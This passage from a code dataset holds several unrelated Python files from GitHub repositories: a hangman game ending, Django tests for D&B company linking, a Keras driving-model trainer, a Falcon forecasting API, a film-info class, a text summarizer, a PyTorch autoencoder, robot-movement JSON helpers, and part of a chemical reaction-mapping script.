(Y/N)\").upper() == \"Y\":\n word = get_word()\n play(word)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"brenddesigns/hangman","sub_path":"Hangman/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":6388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4261026742","text":"from urllib.parse import urljoin\n\nimport pytest\nfrom django.conf import settings\nfrom django.utils.timezone import now\nfrom freezegun import freeze_time\n\nfrom datahub.company.models import Company\nfrom datahub.company.test.factories import AdviserFactory, CompanyFactory\nfrom datahub.dnb_api.link_company import CompanyAlreadyDNBLinkedError, link_company_with_dnb\nfrom datahub.dnb_api.test.utils import model_to_dict_company\nfrom datahub.dnb_api.utils import DNBServiceInvalidRequestError\nfrom datahub.metadata.models import Country\n\npytestmark = pytest.mark.django_db\n\n\nDNB_V2_SEARCH_URL = urljoin(f'{settings.DNB_SERVICE_BASE_URL}/', 'v2/companies/search/')\n\n\n@freeze_time('2019-01-01 11:12:13')\ndef test_link_company_with_dnb_success(\n requests_mock,\n dnb_response_uk,\n base_company_dict,\n):\n \"\"\"\n Test the link_company_with_dnb utility.\n \"\"\"\n requests_mock.post(\n DNB_V2_SEARCH_URL,\n json=dnb_response_uk,\n )\n company = CompanyFactory()\n original_company = Company.objects.get(id=company.id)\n modifying_adviser = AdviserFactory()\n link_company_with_dnb(company.id, '123456789', modifying_adviser)\n company.refresh_from_db()\n uk_country = Country.objects.get(iso_alpha2_code='GB')\n assert model_to_dict_company(company) == {\n **base_company_dict,\n 'address_1': 'Unit 10, Ockham Drive',\n 'address_2': '',\n 'address_country': uk_country.id,\n 'address_county': '',\n 'address_postcode': 'UB6 0F2',\n 'address_area': None,\n 'address_town': 'GREENFORD',\n 'archived_documents_url_path': original_company.archived_documents_url_path,\n 'business_type': original_company.business_type_id,\n 'company_number': '01261539',\n 'created_by': original_company.created_by_id,\n 'duns_number': '123456789',\n 'employee_range': original_company.employee_range_id,\n 'export_experience_category': original_company.export_experience_category_id,\n 'global_ultimate_duns_number': '291332174',\n 'id': original_company.id,\n 'modified_by': modifying_adviser.id,\n 'name': 'FOO BICYCLE LIMITED',\n 'is_number_of_employees_estimated': True,\n 'number_of_employees': 260,\n 'pending_dnb_investigation': False,\n 'reference_code': '',\n 'registered_address_area': None,\n 'sector': original_company.sector_id,\n 'export_segment': original_company.export_segment,\n 'export_sub_segment': original_company.export_sub_segment,\n 'turnover': 50651895,\n 'turnover_range': original_company.turnover_range_id,\n 'uk_region': original_company.uk_region_id,\n 'dnb_modified_on': now(),\n 'strategy': '',\n 'is_out_of_business': original_company.is_out_of_business,\n }\n\n\ndef test_link_company_with_dnb_duns_already_set():\n \"\"\"\n Test link_company_with_dnb when it is called for a company which has already\n been linked with a DNB record.\n \"\"\"\n company = CompanyFactory(duns_number='123456788')\n modifying_adviser = AdviserFactory()\n with pytest.raises(CompanyAlreadyDNBLinkedError):\n link_company_with_dnb(company.id, '123456789', modifying_adviser)\n\n\ndef test_link_company_with_dnb_sync_task_failure(\n requests_mock,\n dnb_response_uk,\n):\n \"\"\"\n Test link_company_with_dnb when the sync_company_with_dnb task encounters\n a failure - 
expect the exception to bubble up.\n \"\"\"\n malformed_response = dnb_response_uk.copy()\n del malformed_response['results']\n requests_mock.post(\n DNB_V2_SEARCH_URL,\n json=malformed_response,\n )\n company = CompanyFactory()\n original_company = Company.objects.get(id=company.id)\n modifying_adviser = AdviserFactory()\n with pytest.raises(DNBServiceInvalidRequestError):\n link_company_with_dnb(company.id, '123456789', modifying_adviser)\n company.refresh_from_db()\n # Ensure that any changes to the record were rolled back due to the task failure\n assert company.duns_number is None\n assert company.modified_by == original_company.modified_by\n","repo_name":"uktrade/data-hub-api","sub_path":"datahub/dnb_api/test/test_link_company.py","file_name":"test_link_company.py","file_ext":"py","file_size_in_byte":4105,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"81"} +{"seq_id":"42770469645","text":"import csv\nfrom math import ceil\n\nimport cv2\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport sklearn\nfrom keras.models import Sequential\nfrom keras.layers import Flatten, Dense, Lambda, BatchNormalization, Dropout, Cropping2D\nfrom keras.layers.convolutional import Convolution2D\nfrom keras.callbacks import EarlyStopping\n\nbatch_size = 32\nlines = []\n\n# load stored data\nwith open('./data/driving_log.csv') as csvfile:\n reader = csv.reader(csvfile)\n for line in reader:\n lines.append(line)\n\n\n# helper function to read image from path\ndef read_image_from_disk(source_path):\n file_name = source_path.split('/')[-1]\n current_path = \"./data/IMG/\" + file_name\n image = cv2.imread(current_path)\n return image\n\n\n# splitting data into train_samples and validation_samples\ntrain_samples, validation_samples = train_test_split(lines, test_size=0.2)\n\n\n# create a generator for memory efficiency\ndef generator(samples, batch_size=32):\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates\n sklearn.utils.shuffle(samples)\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset + batch_size]\n\n images, measurements = [], []\n\n for sample in batch_samples:\n # create adjusted steering measurements for the center and side camera images\n\n # center image\n measurement = float(sample[3])\n center_image = read_image_from_disk(sample[0])\n images.append(center_image)\n\n measurements.append(measurement)\n\n images.append(cv2.flip(center_image, 1))\n measurements.append(measurement * -1.0)\n\n # side images\n left_image = read_image_from_disk(sample[1])\n right_image = read_image_from_disk(sample[2])\n\n correction = 0.2 # this is a parameter to tune\n steering_left = measurement + correction\n steering_right = measurement - correction\n\n measurements.extend([steering_left, steering_right])\n images.extend([left_image, right_image])\n\n # convert images and measurements to np.array\n X_train = np.array(images)\n y_train = np.array(measurements)\n\n yield sklearn.utils.shuffle(X_train, y_train)\n\n\n# compile and train the model using the generator function\ntrain_generator = generator(train_samples, batch_size=batch_size)\nvalidation_generator = generator(validation_samples, batch_size=batch_size)\n\ncallbacks = [EarlyStopping(monitor='val_loss', min_delta=0, patience=0, verbose=0, mode='auto', baseline=None,\n restore_best_weights=True)]\n# define model\nmodel = Sequential()\n\n# preprocess input normalize and crop\nmodel.add(Lambda(lambda x: x / 
255.0 - 0.5, input_shape=(160, 320, 3)))\nmodel.add(Cropping2D(cropping=((50, 20), (0, 0))))\n\n# add Convolution2D layers\nmodel.add(Convolution2D(filters=24, kernel_size=(5, 5), padding='valid', activation='relu'))\nmodel.add(Convolution2D(filters=36, kernel_size=(5, 5), padding='valid', activation='relu'))\nmodel.add(Convolution2D(filters=48, kernel_size=(5, 5), padding='valid', activation='relu'))\nmodel.add(Convolution2D(filters=64, kernel_size=(3, 3), padding='valid', activation='relu'))\nmodel.add(Convolution2D(filters=64, kernel_size=(3, 3), padding='valid', activation='relu'))\n\n# add fully connected layers\nmodel.add(Flatten())\nmodel.add(Dense(100, activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(Dropout(0.4))\nmodel.add(Dense(50, activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(Dense(50, activation='relu'))\nmodel.add(Dense(10, activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(Dense(1))\n\nmodel.compile(loss='mse', optimizer='adam')\nmodel.fit_generator(train_generator,\n steps_per_epoch=ceil(len(train_samples) / batch_size),\n validation_data=validation_generator,\n validation_steps=ceil(len(validation_samples) / batch_size),\n epochs=5, verbose=1, callbacks=callbacks)\n\n# save result\nmodel.save('model.h5')\n","repo_name":"andriikushch/CarND-Behavioral-Cloning-P3","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"22626426078","text":"import traceback\nimport falcon\nimport structlog\n\nfrom forecast_api.api.ping import PingResource\nfrom forecast_api.api.forecast import ForecastResource\nfrom forecast_api.api.forecast import GenericForecastResource\n\nfrom forecast_api.app import create_container\n\n_log = structlog.get_logger(__name__)\n\n\ndef configure_callable(ini_path=None):\n return create_callable(create_container(ini_path))\n\n\ndef handle_uncaught_exceptions(ex, request, response, params):\n if isinstance(ex, falcon.HTTPError):\n raise ex\n\n _log.error(f'unexpected {ex!r}:\\n{traceback.format_tb(ex.__traceback__)}')\n\n raise falcon.HTTPInternalServerError(\n description='I am sorry Dave, I am afraid, I cannot do that'\n )\n\n\ndef create_callable(container):\n app = falcon.API()\n app.add_route(\n '/alert/ping',\n PingResource()\n )\n app.add_route(\n '/v1/forecast/average',\n ForecastResource(\n container('services.methods.average')\n\n )\n )\n app.add_route(\n '/v1/forecast/holt',\n ForecastResource(\n container('services.methods.holt')\n )\n )\n app.add_route(\n '/v1/forecast/holtwinter',\n ForecastResource(\n container('services.methods.holtwinter')\n )\n )\n app.add_route(\n '/v1/forecast/{forecast_method}',\n GenericForecastResource(\n )\n )\n\n app.add_error_handler(Exception, handle_uncaught_exceptions)\n return app\n","repo_name":"drandrewcsmith/forecast_api","sub_path":"forecast_api/wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32010687362","text":"import os\nclass Film():\n def __init__(self,title,description,director,writter,cast,time,country,language,raiting,year,budget,box,profitable\n ,oscar_nom,oscar_win,trailer):\n self.title=title\n self.description=description\n self.director=director\n self.writter=writter\n self.cast=cast\n self.time=time\n self.country=country\n self.language=language\n self.raiting=raiting\n 
self.year=year\n self.budget=budget\n self.box=box\n self.profitable=profitable\n self.oscar_nom=oscar_nom\n self.oscar_win=oscar_win\n self.trailer=trailer\n\n def save_info(self):\n return vars(self)\n def upload_file(self):\n mother_dir=\"D:/Python study/pythonProject/Hilel/lesson _15_classes/lesson_14_copy/film_player/film_storage\"\n for dirs in os.listdir(mother_dir):\n if os.path.isdir(os.path.join(mother_dir,dirs)) and dirs==self.save_info()[\"title\"][0]:\n dir_path=os.path.join(mother_dir,dirs)\n with open(dir_path+\"/\"+self.title+\".txt\",\"w\") as f:\n for key,value in self.save_info().items():\n f.write(f\"{key}: {value} \\n\")\n def get_film_address(self):\n mother_dir = \"D:/Python study/pythonProject/Hilel/lesson _15_classes/lesson_14_copy/film_player/film_storage\"\n for dirpath , dirnames , files in os.walk(mother_dir):\n for file in files:\n if file==str(self.title+\".txt\"):\n file_path=os.path.join(dirpath,file)\n return file_path\n\n\n#створення екземпляру класа\nCrazy=Film(\"Crazy, Stupid, Love.\",\"A middle-aged husband's life changes dramatically when his wife asks him for a divorce.\\\n He seeks to rediscover his manhood with the help of a newfound friend, Jacob, learning to pick up girls at bars.\",\n \"Glenn Ficarra John Requa\" , \" Dan Fogelman\",\"Steve Carell Ryan Gosling Julianne Moore\",\n \" 118 minutes\",\n \"United States\",\n \"English\",\n \"7.4\",\n \"2011\",\n \"$50 million\",\n \"$145 million\",\n \" Yes\",\n \" No\",\n \"No\",\n \"https://www.imdb.com/video/vi3722091801/\")\n#створення словника з введеною інформацією екземпляра\nCrazy.save_info()\n#створення файлу тхт у відповідній директорії та наповнення його інформацією отриманою при заповненні ексземпляра\nCrazy.upload_file()\n#ініціація пошуку файлу в теках по попередньо наданій інформації\nprint(Crazy.get_film_address())\n\n","repo_name":"Poprop/pythonProject","sub_path":"Hilel/lesson _15_classes/lesson_14_copy/film_player/films_worker.py","file_name":"films_worker.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3506341950","text":"import nltk\nfrom extractor import Extractor\nimport math\nimport re\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\nimport json \n\nN = 5\nPATH = \"C:/Users/sneha/Desktop/IRProject/bbcsport/dataset/data\"\n\nclass Summarizer:\n \n def getFiles(self):\n onlyfiles = [f for f in listdir(PATH) if isfile(join(PATH, f))]\n return onlyfiles\n\n def getDocTokens(self, document):\n tokens = set()\n e = Extractor(document)\n tokens = set(e.rank_words())\n return tokens\n\n def countFreq(self, document, word):\n return sum(1 for _ in re.finditer(r'\\b%s\\b' % re.escape(word), document.lower()))\n\n def getDocTF(self, document, token):\n freq = self.countFreq(document, token)\n tf = 1 + math.log10(freq) if freq != 0 else 0\n return tf\n\n def calculateIDF(self, corpus, tokens):\n sentences = nltk.sent_tokenize(corpus)\n n = len(sentences)\n idf = {}\n\n for token in tokens:\n idf[token] = 0\n\n for token in tokens:\n for sentence in sentences:\n if token in sentence:\n if token not in idf:\n idf[token] = 0 \n idf[token] += 1\n\n for token in tokens:\n df = idf[token]\n if df != 0:\n idf[token] = math.log10(n/df)\n else:\n idf[token] = 0\n\n return idf\n \n def vectorizeDoc(self, document, tokens, idf):\n tfIdf = []\n for token in tokens:\n tfIdf.append(self.getDocTF(document, token) * idf[token])\n return tfIdf\n\n def normalize(self, 
docWeights):\n normWeights = docWeights\n if all(i == 0 for i in normWeights):\n return normWeights\n squared = [i ** 2 for i in docWeights]\n normWeights = [float(i)/float(math.sqrt(sum(squared))) for i in docWeights]\n return normWeights\n\n def computeCosine(self, document, tokens, idf, corpus):\n cosine = 0\n docVector = self.normalize(self.vectorizeDoc(document.lower(), tokens, idf))\n for doc in corpus:\n if doc != document:\n vector = self.normalize(self.vectorizeDoc(doc.lower(), tokens, idf))\n result = [a*b for a,b in zip(vector, docVector)]\n cosine += sum(result)\n return cosine\n\n def getSummary(self, tokens, idf, corpus):\n weights = []\n for doc in corpus:\n dict = {}\n cosine = self.computeCosine(doc.lower(), tokens, idf, corpus)\n dict['doc'] = doc\n dict['weight'] = cosine\n weights.append(dict)\n result = sorted(weights, key=lambda k: k['weight'])\n return result[0:N]\n\n def writeIndex(self, index):\n json.dump(index, open(\"C:/Users/sneha/Desktop/IRProject/summary_index.txt\", 'w')) \n\n\n def createSummaryIndex(self):\n index = {}\n for file in self.getFiles():\n tokens = self.getDocTokens((open(PATH + \"/\" + file).read()).lower())\n idf = self.calculateIDF((open(PATH + \"/\" + file).read()).lower(), tokens)\n sentences = nltk.sent_tokenize(open(PATH + \"/\" + file).read())\n first = sentences.pop(0)\n summary = self.getSummary(tokens, idf, sentences)\n result = first\n for i in range(len(summary)):\n result = result + \" \" + summary[i].get('doc')\n result = result.replace('\\n', ' ')\n index[file] = result\n self.writeIndex(index)\n\n\nif __name__==\"__main__\":\n s = Summarizer()\n s.createSummaryIndex()\n ","repo_name":"ac491/Extractive-Multi-Doc-summarizer","sub_path":"summarizer.py","file_name":"summarizer.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"14708120478","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 9 21:10:36 2022\r\n\r\n@author: ABHRANIL\r\n\"\"\"\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\n\r\nclass AutoEncoder(nn.Module):\r\n def __init__(self):\r\n super().__init__()\r\n \r\n self.conv_layer_1 = nn.Conv2d(in_channels = 3, out_channels = 32, kernel_size = 1)\r\n self.conv_layer_2 = nn.Conv2d(in_channels = 32, out_channels = 64, kernel_size = 1)\r\n self.conv_layer_3 = nn.Conv2d(in_channels = 64, out_channels = 128, kernel_size = 1)\r\n \r\n self.act_layer = nn.ReLU()\r\n \r\n self.pool_layer = nn.MaxPool2d(kernel_size = 2, stride = 2)\r\n \r\n self.up_conv_layer_1 = nn.ConvTranspose2d(in_channels = 128, out_channels = 64, kernel_size = 2, stride = 2)\r\n self.up_conv_layer_2 = nn.ConvTranspose2d(in_channels = 64, out_channels = 32, kernel_size = 2, stride = 2) \r\n \r\n def forward(self, x):\r\n z1 = self.conv_layer_1(x)\r\n a1 = self.act_layer(z1)\r\n a1 = self.pool_layer(a1)\r\n z2 = self.conv_layer_2(a1)\r\n a2 = self.act_layer(z2)\r\n y1 = a2 # saving activation before pooling for feature extraction\r\n a2 = self.pool_layer(a2)\r\n z3 = self.conv_layer_3(a2)\r\n a3 = self.act_layer(z3)\r\n y2 = a3 # saving activation for feature extraction\r\n z4 = self.up_conv_layer_1(a3)\r\n a4 = self.act_layer(z4)\r\n z5 = self.up_conv_layer_2(a4)\r\n a5 = self.act_layer(z5)\r\n y = a5\r\n \r\n return y, y1, y2\r\n \r\nclass Model(nn.Module):\r\n \r\n def __init__(self):\r\n super().__init__()\r\n self.auto_encoder = AutoEncoder()\r\n \r\n # layer for upscaling second activation obtained from 
output of encoder\r\n self.up_scale_layer_1 = nn.ConvTranspose2d(in_channels = 64, out_channels = 32, kernel_size = 2, stride = 2)\r\n \r\n # layer for upscaling third activation obtained from output of encoder\r\n self.up_scale_layer_2 = nn.ConvTranspose2d(in_channels = 128, out_channels = 32, kernel_size = 4, stride = 4)\r\n \r\n # main convolutional model\r\n self.conv_layer = nn.Conv2d(in_channels = 192, out_channels = 3, kernel_size = 1)\r\n self.act_layer = nn.ReLU()\r\n \r\n def forward(self, x1, x2):\r\n \r\n y1, y1_1, y1_2 = self.auto_encoder(x1)\r\n y2, y2_1, y2_2 = self.auto_encoder(x1)\r\n \r\n y = torch.concat((y1, y2), dim = 0)\r\n \r\n y1_1 = self.up_scale_layer_1(y1_1)\r\n y2_1 = self.up_scale_layer_1(y2_1)\r\n y_1 = torch.concat((y1_1, y2_1), dim = 0)\r\n \r\n y1_2 = self.up_scale_layer_1(y1_2)\r\n y2_2 = self.up_scale_layer_1(y2_2)\r\n y_2 = torch.concat((y1_2, y2_2), dim = 0)\r\n \r\n x = torch.concat((y, y_1, y_2), dim = 0)\r\n \r\n z1 = self.conv_layer(x)\r\n a1 = self.act_layer(z1)\r\n out = a1\r\n \r\n return out\r\n \r\ndef obtain_model(device = torch.device('cpu')):\r\n return Model().to(device)","repo_name":"DrDoofenshmrtz/FPSBooster","sub_path":"Model/ModelComponents/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73201099145","text":"import json\nfrom typing import Dict, Any\n\nfrom preprocessing.movement import SimpleMovement, LinearMovement, JointMovement, Movement, CompoundMovement\nfrom preprocessing.position import Position\nfrom preprocessing.robot import Robot\nfrom utils.bad_input_file_error import BadInputFileError\nfrom utils.geometry_3d import Point3D\n\n\ndef read_json_from_file(filename: str) -> Any:\n with open(filename) as file:\n data = json.load(file)\n return data\n\n\ndef save_to_json_file(filename: str, data: Any):\n with open(filename, \"w\") as file:\n json.dump(data, file)\n\n\ndef point3d_from_json(point_json: Dict) -> Point3D:\n return Point3D(point_json['x'], point_json['y'], point_json['z'])\n\n\ndef robot_from_json(robot_json: Dict) -> Robot:\n return Robot(\n robot_json['id'],\n point3d_from_json(robot_json['position']),\n robot_json['weight'],\n robot_json['load_capacity'],\n robot_json['input_power'],\n )\n\n\ndef simple_movement_from_partial_json(\n partial_movement_json: Dict,\n payload_weight: float,\n robot: Robot,\n) -> SimpleMovement:\n movement_type = partial_movement_json['movement_type']\n start = partial_movement_json['start']\n end = partial_movement_json['end']\n\n if movement_type == 'linear':\n return LinearMovement(start, end, payload_weight, robot)\n elif movement_type == 'joint':\n return JointMovement(start, end, payload_weight, robot)\n else:\n raise BadInputFileError(\n 'Partial movement type must be \"linear\" or \"joint\", not {}'.format(movement_type)\n )\n\n\ndef linear_movement_from_json(json_dict: Dict, robots: Dict[str, Robot]) -> Movement:\n return LinearMovement(\n point3d_from_json(json_dict['start']),\n point3d_from_json(json_dict['end']),\n json_dict['mass'],\n robots[json_dict['robot_id']]\n )\n\n\ndef joint_movement_from_json(json_dict: Dict, robots: Dict[str, Robot]) -> Movement:\n return JointMovement(\n point3d_from_json(json_dict['start']),\n point3d_from_json(json_dict['end']),\n json_dict['mass'],\n robots[json_dict['robot_id']]\n )\n\n\ndef compound_movement_from_json(json_dict: Dict, robots: Dict[str, Robot]) -> Movement:\n mass = json_dict['mass']\n robot 
= robots[json_dict['robot_id']]\n part_movements = [\n simple_movement_from_partial_json(partial_json, mass, robot)\n for partial_json in json_dict['parts']\n ]\n\n return CompoundMovement(part_movements, mass, robot)\n\n\ndef movement_from_json(json_dict: Dict, robots: Dict[str, Robot]) -> Movement:\n if json_dict['movement_type'] == 'linear':\n return linear_movement_from_json(json_dict, robots)\n elif json_dict['movement_type'] == 'joint':\n return joint_movement_from_json(json_dict, robots)\n elif json_dict['movement_type'] == 'compound':\n return compound_movement_from_json(json_dict, robots)\n else:\n raise BadInputFileError(\n 'Movement type must be \"linear\", \"joint\", or \"compound\", not \"{}\"'.format(json_dict['movement_type'])\n )\n\n\ndef position_from_json(json_dict: Dict, robots: Dict[str, Robot]) -> Position:\n return Position(\n point3d_from_json(json_dict['coordinates']),\n json_dict['mass'],\n robots[json_dict['robot_id']],\n )\n","repo_name":"kotliluk/rce-optimizer","sub_path":"utils/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40177968611","text":"from MainFunctions import *\nfrom BalanceRxns import *\n\nfrom collections import OrderedDict #Preserve order of keys relative to reaction from left to right\nfrom rdkit import Chem\nfrom rdkit.Chem import rdChemReactions #Reaction processing\nimport copy\nfrom rxnmapper import RXNMapper #Importing RXNMapper for unsupervised atom mapping\nimport pandas as pd\nimport rdkit\n#%% Reaction Mapping\n\ndef maprxn(rxns):\n \"\"\"\n For a given list of reactions, rxns, returns mapped reactions with confidence scores.\n Uses IBM transformer model.\n\n Parameters\n ----------\n rxns : list\n List of reaction SMILES (no reactant/reagent split)\n\n Returns\n -------\n Output : list\n Mapped reactions with confidence scores\n\n mapped_rxn: str\n Mapped reaction SMARTS\n\n confidence: str\n Model confidence in the mapping rxn\n\n ['Error']: list\n If code doesn't run or mapper doesn't work\n \"\"\"\n\n rxn_mapper=RXNMapper()\n try:\n return rxn_mapper.get_attention_guided_atom_maps(rxns)\n except Exception:\n return ['Error']\n\ndef maprxns(row):\n '''\n Applies maprxn to each row of a dataframe\n\n '''\n balrxnsmiles=''\n balrxnsmiles=row['balrxnsmiles']\n mappedrxn=maprxn([balrxnsmiles])[0]\n if mappedrxn=='Error':\n return 'Error','Error'\n else:\n mapped_rxn=mappedrxn.get('mapped_rxn')\n conf=mappedrxn.get('confidence')\n return mapped_rxn,conf\n\n\ndef map_rxns(analoguerxnsbalfilt,refmappedrxns=None,ncpus=16,restart=True,reaxys_update=True): #Done\n '''\n Applies maprxn to a given dataframe\n\n '''\n # breakpoint()\n if not analoguerxnsbalfilt.index.name and (not analoguerxnsbalfilt.index.names or None in analoguerxnsbalfilt.index.names):\n idxreset=True\n else:\n idxreset=False\n idxcol=[]\n if reaxys_update:\n idxcol=['ReactionID','Instance']\n else:\n idxcol=['ReactionID']\n if refmappedrxns is not None:\n analoguerxnsbalfilt,commondf=userefrxns(analoguerxnsbalfilt,idxcol=idxcol,refanaloguerxns=refmappedrxns)\n idxreset=False\n if not analoguerxnsbalfilt.empty:\n if ncpus>1:\n if restart:\n initray(num_cpus=ncpus)\n if not idxreset:\n analoguerxnsbalfilt.reset_index(inplace=True)\n idxreset=True\n analoguerxnsbalfiltdis=mpd.DataFrame(analoguerxnsbalfilt)\n else:\n analoguerxnsbalfiltdis=analoguerxnsbalfilt\n mappedrxns=analoguerxnsbalfiltdis.apply(maprxns,axis=1,result_type='reduce')\n 
mappedrxns=pd.DataFrame(data=mappedrxns.values,index=mappedrxns.index,columns=['mappedrxns'])\n mappedrxns[['mapped_rxn','confidence']]=pd.DataFrame(mappedrxns['mappedrxns'].tolist(),index=mappedrxns.index)\n mappedrxns.drop(columns=['mappedrxns'],inplace=True)\n analoguerxnsmapped=copy.deepcopy(analoguerxnsbalfilt)\n analoguerxnsmapped[['mapped_rxn','confidence']]=mappedrxns\n # breakpoint()\n if idxreset:\n analoguerxnsmapped.set_index(idxcol,inplace=True)\n if refmappedrxns is not None and not commondf.empty:\n analoguerxnsmapped=pd.concat([analoguerxnsmapped,commondf])\n else:\n analoguerxnsmapped=commondf\n return analoguerxnsmapped\n\n\ndef checkrxns(analoguerxnsmappedfilt,refparsedrxns=None,ncpus=16,updateall=True,removeunmapped=True,restart=True,\n reaxys_update=True): #Done\n if not analoguerxnsmappedfilt.index.name and (not analoguerxnsmappedfilt.index.names or None in analoguerxnsmappedfilt.index.names):\n idxreset=True\n else:\n idxreset=False\n idxcol=[]\n if reaxys_update:\n idxcol=['ReactionID','Instance']\n else:\n idxcol=['ReactionID']\n if refparsedrxns is not None:\n analoguerxnsmappedfilt,commondf=userefrxns(analoguerxnsmappedfilt,idxcol=idxcol,refanaloguerxns=refparsedrxns)\n idxreset=False\n if not analoguerxnsmappedfilt.empty:\n if ncpus>1:\n if restart:\n initray(num_cpus=ncpus)\n if not idxreset:\n analoguerxnsmappedfilt.reset_index(inplace=True)\n idxreset=True\n analoguerxnsmappedfiltdis=mpd.DataFrame(analoguerxnsmappedfilt)\n else:\n analoguerxnsmappedfiltdis=analoguerxnsmappedfilt\n compdupdate=analoguerxnsmappedfiltdis.apply(checkrxnrow,updateall=updateall,removeunmapped=removeunmapped,axis=1,result_type='reduce')\n compdupdate=pd.Series(data=compdupdate.values,index=compdupdate.index) #Optional convert modin back to pandas\n compdupdatedf=pd.DataFrame(data=compdupdate.tolist(),index=compdupdate.index,columns=['LHSdata','RHSdata','msg1'])\n analoguerxnsparsed=copy.deepcopy(analoguerxnsmappedfilt)\n analoguerxnsparsed[['LHSdata','RHSdata','msg1']]=compdupdatedf\n if idxreset:\n analoguerxnsparsed.set_index(idxcol,inplace=True)\n if refparsedrxns is not None and not commondf.empty:\n analoguerxnsparsed=pd.concat([analoguerxnsparsed,commondf])\n else:\n analoguerxnsparsed=commondf\n return analoguerxnsparsed\n\ndef checkrxnrow(row,updateall=True,removeunmapped=True):\n # breakpoint()\n mappedrxn=row['mapped_rxn']\n Rdata=row['LHSdata']\n Pdata=row['RHSdata']\n msg=row['msg']\n if 'with species' in msg:\n mandrcts=set(Rdata.keys())-set([int(addedspec) for addedspec in msg.rsplit('with species: ',1)[1].split(' with help product(s): ')[0].split(',')])\n else:\n mandrcts=set(Rdata.keys())\n if 'With hydrogen carriers' in msg:\n hcarriers=[int(hcarrier) for hcarrier in msg.split('With hydrogen carriers: ')[1].split(', ')[0].split(',')]\n else:\n hcarriers=[]\n if 'Mandatory' in msg:\n mandrcts=mandrcts.union({int(mandrct) for mandrct in msg.split('Mandatory species unmapped from LHS: ')[1].split(', ')[0].split(',')})\n res=checkrxn(mappedrxn,Rdata=Rdata,Pdata=Pdata,updateall=updateall,removeunmapped=removeunmapped,mandrcts=mandrcts,hcarriers=hcarriers)\n\n return res\n\n\n\ndef checkrxn(mappedrxn,Rdata={},Pdata={},ordered=True,updateall=True,removeunmapped=True,mandrcts=[],mandprods=[],hcarriers=[]): #Assume same rxn smiles stored next to each other\n '''\n Checks reaction, updating mapped and clean molecules, removing unmapped species\n\n '''\n # breakpoint()\n try:\n rdrxn=rdChemReactions.ReactionFromSmarts(mappedrxn,useSmiles=True)\n except Exception:\n return 
Rdata,Pdata,'Error'\n cleanrxn=copy.copy(rdrxn)\n rdChemReactions.RemoveMappingNumbersFromReactions(cleanrxn)\n if ordered:\n LHSdata=OrderedDict({})\n RHSdata=OrderedDict({})\n else:\n LHSdata={}\n RHSdata={}\n msgr=[]\n msgp=[]\n # Updating LHSdata\n if Rdata:\n rsmilesfreq=gensmilesfreq(Rdata)\n smilesmismatch=[]\n rmixtures={}\n mismatch=False\n for ID,rct in enumerate(cleanrxn.GetReactants()):\n mappedmol=rdrxn.GetReactants()[ID]\n formula=rdkit.Chem.rdMolDescriptors.CalcMolFormula(rct)\n if removeunmapped:\n if any([atom.HasProp('molAtomMapNumber') for atom in mappedmol.GetAtoms()]) or formula=='H2' or hcarriers: #Confirmed, mapped reactant\n LHSdata,rmixtures,msg_,ID0=updatespecdict(Rdata,rsmilesfreq,rct,mappedmol,updateddict=LHSdata,mixtures=rmixtures,updateall=updateall,hcarriers=hcarriers)\n if msg_!='Valid':\n # if ID0 not in smilesmismatch:\n # smilesmismatch+=[ID0]\n mismatch=True\n else:\n LHSdata,rmixtures,msg_,ID0=updatespecdict(Rdata,rsmilesfreq,rct,mappedmol,updateddict=LHSdata,mixtures=rmixtures,updateall=updateall,hcarriers=hcarriers)\n if msg_!='Valid':\n # if ID0 not in smilesmismatch:\n # smilesmismatch+=[ID0]\n mismatch=True\n if mismatch:\n smilesmismatch=[ID0 for ID0 in Rdata if ID0 not in LHSdata and ID0 not in rmixtures]\n if smilesmismatch:\n msgr+=['Smiles discrepancy for LHS species: '+', '.join([str(ID) for ID in smilesmismatch])]\n else:\n msgr+=['Smiles discrepancy for LHS species']\n # breakpoint()\n if rmixtures:\n msgr+=['Mixture detected for LHS species: '+','.join([str(ID) for ID in rmixtures])]\n for ID0 in rmixtures:\n localcounts=[int(Counter(rsmilesfreq[mixsmiles])[ID0]) for mixsmiles in rmixtures[ID0]]\n numinsts=[len(rmixtures[ID0][mixsmiles]) for mixsmiles in rmixtures[ID0]]\n lb=[0 for j in range(len(numinsts))]\n ub=[0 for j in range(len(numinsts))]\n div=[int(ceil(numinst/localcount)) for numinst,localcount in zip(numinsts,localcounts)]\n count=max(div)\n if updateall:\n LHSdata[ID0].update({'mappedsmiles':[],'cleanmol':[],'unmappedmix':[]})\n for i in range(count):\n mappedsmiles=[]\n unmappedsmiles=[]\n cleanmol=[]\n for j,mixsmiles in enumerate(rmixtures[ID0]):\n ub_=min(numinsts[j],localcounts[j])\n ub[j]=ub_+lb[j]\n mappedlist=rmixtures[ID0][mixsmiles][lb[j]:ub[j]]\n mappedsmiles+=[comb[0] for comb in mappedlist]\n 